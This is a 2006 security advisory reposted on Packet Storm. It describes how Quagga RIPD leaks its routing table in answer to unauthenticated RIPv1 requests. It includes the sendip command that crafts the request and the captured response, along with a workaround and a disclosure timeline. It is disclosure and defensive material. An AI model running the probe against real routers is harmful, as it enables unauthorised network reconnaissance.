exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

quagga-broadcast.txt

quagga-broadcast.txt
Posted May 6, 2006
Authored by Konstantin V. Gavrilenko | Site arhont.com

Quagga RIPD suffers from an unauthenticated route table broadcast issue. Verified on Quagga Suites 0.98.5 and 0.99.3.

tags | advisory
SHA-256 | c449513208a094287aa203473cbac6b648a2b8373c46461978e0b9894acac7e8

quagga-broadcast.txt

Change Mirror Download
Arhont Ltd - Information Security

Advisory by: Konstantin V. Gavrilenko (http://www.arhont.com)
Arhont ref: arh200604-1
Advisory: Quagga RIPD unauthenticated route table broadcast
Class: design bug?
Version: Tested on Quagga suite v0.98.5 v0.99.3(Gentoo, 2.6.15)
Model Specific: Other versions might have the same bug


DETAILS
Quagga would respond to RIP v1 request for SEND UPDATE and send out the
routing table updates, even if it has been configured to work with
version 2 of the protocol only, using the following settings in the
config file:

interface eth0
ip rip send version 2
ip rip receive version 2
!
router rip
version 2

Sending a request for update:
arhontus / # sendip -p ipv4 -is 192.168.66.102 -p udp -us 520 -ud 520 -p
rip -rv 1 -rc 1 -re 0:0:0:0:0:16 192.168.66.111

Catching response on the attacker host:
arhontus / # tcpdump -n -i eth0 port 520
22:10:02.532103 IP 192.168.66.102.520 > 192.168.66.111.520: RIPv1,
Request, length: 24
22:10:02.532474 IP 192.168.66.111.520 > 192.168.66.102.520: RIPv1,
Response, length: 64

Tethereal extract from the response RIP packet:
Routing Information Protocol
Command: Response (2)
Version: RIPv1 (1)
IP Address: 0.0.0.0, Metric: 1
Address Family: IP (2)
IP Address: 0.0.0.0 (0.0.0.0)
Metric: 1
IP Address: 192.168.50.24, Metric: 1
Address Family: IP (2)
IP Address: 192.168.50.24 (192.168.50.24)
Metric: 1
IP Address: 192.168.77.0, Metric: 1
Address Family: IP (2)
IP Address: 192.168.77.0 (192.168.77.0)
Metric: 1

The same situation is observed if Quagga has been configured to accept
packets with plaintext or md5 authentication only, using the following
options in the configuration:

interface eth0
ip rip authentication mode md5 auth-length old-ripd
ip rip authentication key-chain dmz_auth

The response packet contains the same information as in previous example.


This vulnerability can be exploited to extract the routing table
information from the router otherwise inaccessible due to strict control
of the multicast packets spread on the switch ports, or extremely large
interval set between updates.


RISK FACTOR: Low


WORKAROUNDS: Firewall the access to the ripd daemon on the need to
access basis.

COMMUNICATION HISTORY:
Issue discovered: 10/04/2006
Quagga notified: 24/04/2006
Public disclosure: 03/05/2006

ADDITIONAL INFORMATION:
*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before releasing them to the public domains (such as CERT and BUGTRAQ).

If you would like to get more information about this issue, please do
not hesitate to contact Arhont team on info@arhont.com



--
Respectfully,
Konstantin V. Gavrilenko

Managing Director
Arhont Ltd - Information Security

web: http://www.arhont.com
http://www.wi-foo.com
e-mail: k.gavrilenko@arhont.com

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0xE81824F4
PGP: Server - keyserver.pgp.com
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close